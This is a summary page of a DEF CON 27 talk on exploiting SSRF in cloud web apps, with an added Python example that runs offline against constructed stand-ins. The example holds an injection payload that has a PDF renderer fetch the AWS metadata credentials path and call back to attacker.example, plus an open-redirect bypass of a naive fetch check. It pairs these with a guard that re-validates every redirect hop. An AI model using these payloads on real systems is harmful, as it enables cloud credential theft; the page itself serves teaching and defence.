
Owning The Cloud Through Server-Side Request Forgery

Conference:  Defcon 27

2019-08-01

Summary

The talk covers ways of turning Server-Side Request Forgery (SSRF) in cloud-hosted web applications into access to sensitive data, including reaching internal APIs and the cloud instance metadata service and abusing server-side PDF generation. The speaker stresses the importance of finding creative ways around SSRF defences and highlights how useful the customization options of PDF generators are to an attacker.
  • Internal APIs and the instance metadata service can be reached through SSRF to obtain sensitive information such as credentials
  • Customization options in PDF generation (user-supplied fields rendered into HTML) can be used to inject HTML and JavaScript that the server-side renderer processes
  • Open redirects should not be "burned" by reporting them on their own, because they are useful for bypassing SSRF filters that check only the submitted URL
  • Finding creative ways around security measures is crucial to successful exploitation
The speaker recounts spending three months trying to work out how to exploit a vulnerability in WeasyPrint, a simple Python HTML-to-PDF library. They eventually discovered that they could point an image source at their own server: the renderer's request carried a User-Agent identifying the library, which let them replicate the target environment locally and build the exploit there.
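The techniques summarized above, as an added example that is not code from the talk or its authors: a user-supplied field rendered unescaped into the HTML a server-side PDF engine converts (the injection point), fingerprinting the engine from the User-Agent it sends when it fetches an injected image, an open redirect on an allowed host defeating a guard that validates only the submitted URL, and a guard that re-validates every redirect hop. It uses the Python standard library only; victim.example, attacker.example, evil.example, the fake DNS table, the fake HTTP responses and the credential body are constructed stand-ins, and the renderer User-Agent substrings are assumptions about each engine's default User-Agent rather than something the talk states.

```python
"""SSRF through server-side PDF rendering: the injection point, fingerprinting
the renderer from its callback, the open-redirect bypass, and a fetch guard
that closes it. Stdlib only; DNS and HTTP are constructed stand-ins."""
import html
import ipaddress
from urllib.parse import urljoin, urlparse

# Hypothetical hosts and paths; nothing here is contacted.
ATTACKER_PROBE = "http://attacker.example/probe"
AWS_METADATA = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
OPEN_REDIRECT = "https://victim.example/redirect?to="
FAKE_CREDS = b'{"AccessKeyId": "CONSTRUCTED-NOT-REAL"}'  # constructed body

# 1. The injection point: a user-controlled field dropped into the PDF's HTML.
INVOICE_TEMPLATE = "<html><body><h1>Invoice for {name}</h1></body></html>"


def build_invoice_html(name, escape=True):
    """With escape=False the 'name' becomes markup, so a value such as
    '<iframe src="http://169.254.169.254/...">' is fetched by the renderer,
    which runs on the server, and its content lands in the PDF."""
    return INVOICE_TEMPLATE.format(name=html.escape(name) if escape else name)


# 2. Fingerprinting: an <img src=ATTACKER_PROBE> makes the renderer call out;
# the User-Agent of that request names the engine. The substrings below are
# assumed from each engine's default User-Agent, not taken from the talk.
RENDERER_SIGNATURES = (
    ("weasyprint", "weasyprint"),
    ("wkhtmltopdf", "wkhtmltopdf"),
    ("prince", "prince"),
    ("headlesschrome", "chrome-headless"),
)


def fingerprint_renderer(user_agent):
    ua = user_agent.lower()
    for needle, engine in RENDERER_SIGNATURES:
        if needle in ua:
            return engine
    return "unknown"


# 3. Outbound fetch guard: allow-listed scheme, resolve the host, refuse any
# non-public address (169.254.169.254, 10/8, 127/8, IPv4-mapped IPv6 forms)
# and the GCP metadata hostname.
class BlockedTarget(Exception):
    pass


REDIRECT_STATUSES = (301, 302, 303, 307, 308)


def check_target(url, resolve):
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise BlockedTarget(f"scheme or host not allowed: {url}")
    if parts.hostname == "metadata.google.internal":
        raise BlockedTarget("cloud metadata hostname")
    try:
        ip = ipaddress.ip_address(resolve(parts.hostname))
    except ValueError as exc:
        raise BlockedTarget(f"cannot resolve {parts.hostname}") from exc
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # ::ffff:169.254.169.254 is still the metadata host
    if not ip.is_global:
        raise BlockedTarget(f"{parts.hostname} resolves to non-public {ip}")
    return url


def naive_fetch(url, resolve, http_get, max_hops=5):
    """Checks only the URL the user supplied, then follows redirects blindly:
    an open redirect on an allowed host turns it into a metadata read."""
    check_target(url, resolve)
    for _ in range(max_hops):
        status, headers, body = http_get(url)
        if status not in REDIRECT_STATUSES:
            return body
        url = urljoin(url, headers["Location"])
    raise BlockedTarget("too many redirects")


def safe_fetch(url, resolve, http_get, max_hops=5):
    """Re-validates every hop, so the redirect target is checked too."""
    for _ in range(max_hops):
        check_target(url, resolve)
        status, headers, body = http_get(url)
        if status not in REDIRECT_STATUSES:
            return body
        url = urljoin(url, headers["Location"])
    raise BlockedTarget("too many redirects")


# Constructed stand-ins for DNS and HTTP so the example runs offline.
FAKE_DNS = {"victim.example": "93.184.216.34", "evil.example": "169.254.169.254"}


def fake_resolve(hostname):
    return FAKE_DNS.get(hostname, hostname)  # IP literals resolve to themselves


def fake_http_get(url):
    if url.startswith(OPEN_REDIRECT):
        return 302, {"Location": url[len(OPEN_REDIRECT):]}, b""
    if url.startswith("http://169.254.169.254/"):
        return 200, {}, FAKE_CREDS
    return 200, {}, b"<html>public page</html>"


def blocked(fn, *args):
    """True if the guard refused the request."""
    try:
        fn(*args)
    except BlockedTarget:
        return True
    return False


if __name__ == "__main__":
    payload = f'<iframe src="{AWS_METADATA}"></iframe><img src="{ATTACKER_PROBE}">'
    print(build_invoice_html(payload, escape=False))
    print(fingerprint_renderer("WeasyPrint 45.0 (https://weasyprint.org/)"))
    bypass = OPEN_REDIRECT + AWS_METADATA
    print(naive_fetch(bypass, fake_resolve, fake_http_get))          # credentials leak
    print(blocked(safe_fetch, bypass, fake_resolve, fake_http_get))  # True
```

Running the module prints the injected invoice HTML, the fingerprinted engine, the credential body that the naive fetcher hands back after following the open redirect, and True for the guarded fetcher refusing the same request. The design point is that the guard runs on the resolved address of every hop, not once on the hostname the user typed, which is what the open-redirect and DNS-pointing bypasses rely on.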

Abstract

With so many apps running in the cloud, hacking these instances becomes easier with a simple vulnerability due to unsanitized user input. In this talk, we'll discuss a number of different methods that helped us exfiltrate data from different applications using Server-Side Request Forgery (SSRF). Using these methods, we were able to hack some of the major transportation, hospitality, and social media companies and make $50,000 in rewards in 3 months.
